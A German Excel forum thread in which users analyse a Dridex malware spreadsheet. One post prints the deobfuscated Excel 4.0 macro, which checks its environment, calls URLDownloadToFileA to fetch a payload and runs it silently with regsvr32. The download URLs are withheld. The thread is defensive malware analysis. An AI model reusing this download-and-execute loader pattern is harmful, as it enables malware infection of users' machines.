Dieses Forum nutzt Cookies
Dieses Forum verwendet Cookies, um deine Login-Informationen zu speichern, wenn du registriert bist, und deinen letzten Besuch, wenn du es nicht bist. Cookies sind kleine Textdokumente, die auf deinem Computer gespeichert werden. Die von diesem Forum gesetzten Cookies werden nur auf dieser Website verwendet und stellen kein Sicherheitsrisiko dar. Cookies aus diesem Forum speichern auch die spezifischen Themen, die du gelesen hast und wann du zum letzten Mal gelesen hast. Bitte bestätige, ob du diese Cookies akzeptierst oder ablehnst.

Ein Cookie wird in deinem Browser unabhängig von der Wahl gespeichert, um zu verhindern, dass dir diese Frage erneut gestellt wird. Du kannst deine Cookie-Einstellungen jederzeit über den Link in der Fußzeile ändern.

Dridex: VBA lesen
#1
Hallo,

im Anhang befindet sich der VBA-Code und der Inhalt einiger Zellen einer xlsx-Version der Dridex-malware. Das Auslesen unter Linux mit LibreOffice kann auch einige Inhalte, z.B. Beschriftung von Shapes, nicht erkennen, so dass es keine Garantie auf Vollständigkeit gibt.

Den VBA-Code kann ich nicht entziffern, aber bei den Zellinhalten (am Ende der Datei) kann ich nicht einmal die Sprache erkennen. Könnte das Excel4Macro-Code sein? Es ist immer mögllich, dass einige Teile nur zur Verwirrung und Verschleierung eingefügt wurden.

mfg

(Ein Spezialist konnte 4 url's auslesen, aber er hat nicht beschrieben, wie das geht)
(Die Datei ist frei im Netz verfügbar, trotzdem möchte ich keine google-fähigen Informationen veröffentlichen)

ANHANG AUF WUSCH DES THREADERSTELLERS GELÖSCHT
MODERATOR
[-] Folgende(r) 1 Nutzer sagt Danke an Fennek für diesen Beitrag:
  • Mase
Antworten Top
#2
code obfuscation würde ich sagen.
Antworten Top
#3
Hallo,

sorry, nach langer Analyse der Word-Version, habe ich bei der Excel-Version etwas die Nerven verloren.

Am späteren Abend und nach einer "Rundreise" durch die mit der malware verknüften Twitter-Accounts der Reporter habe ich dann die Lösung gefunden:

Im Gegensatz zu meinen Vorurteilen sind Excel4Macro alles andere als harmlos:

Code:
Range("A460:A464") '#### Excel4Macro DEAKTIVIEREN ####

IF(ISNUMBER(SEARCH("do",GET.WORKSPACE(1))), ,CLOSE(TRUE))
CALL("Kernel32","CreateDirectoryA","JCJ","C:\;",0)
CALL("Kernel32","CreateDirectoryA","JCJ","C:\;\'",0)
CALL("URLMON","URLDownloadToFileA", "JJCCJJ",0,"X","C:\;\'\$.",0,0)
CALL("Shell32","ShellExecuteA", "JJCCCCJ",0,"Open","regsvr32"," -s C:\;\'\$.",0,0)

Die "verschlüsselten" Texte erwiesen sich als "Caesar" mit dem Spaltenindex als Parameter.

Damit ergibt sich aus meiner Sicht ein gesellschaftliches Problem: Die malware-Autoren meinten, sehr viele urls in dieser "Loader"-Datei einbetten zu können. Auf der Basis einer Stichprobe von 1 ist zu befürchten, dass diese Annahme nicht ganz falsch ist. Es gibt sehr viele Information, von welchen Servern malware verteilt wird. Diese Server stehen auch in Ländern, die ich für seriös halte, aber das Entfernen kann trotzdem mehrere Tage dauern.

Es gibt sogar eine Liste mit den C2-Servern von Emotet für die letzen 7 Jahre und dem Status "online" bzw "offline". Dabei haben Länder in West-Europa und Nord-Amerika auch einen Anteil. Ich halte diese Liste für "staatsnah", d.h. staatliche IT-Sicherheits-Teams arbeiten dort mit. (nicht Deutschland). Der Anbieter, der clever-excel hosted, war gestern mit einem C2-Server auch aktiv dabei. Sofern ich mich nicht irre, auch in Einzelfällen beim Verteilen von malware.

Da einem Bekannten auf diese Art die Lebenversicherung gestohlen wurde, möchte ich es einmal etwas emotionaler sagen: Es ist zum k...
Antworten Top
#4
Hallo,

hier noch ein bißchen Doku zu CALL: https://support.microsoft.com/en-us/offi...63d188307f
Und ein Artikel (Englisch), den Du aber vielleicht schon kennst: https://www.cybereason.com/blog/excel4.0...e-the-bits

Gruß
Microsoft Excel Expert · Microsoft Most Valuable Professional (MVP) :: 2011-2019 & 2020-2022 :: 10 Awards
https://de.excel-translator.de/translator :: Online Excel-Formel-Übersetzer :: Funktionen :: Fehlerwerte :: Argumente :: Tabellenbezeichner
Antworten Top


Gehe zu:


Benutzer, die gerade dieses Thema anschauen: 1 Gast/Gäste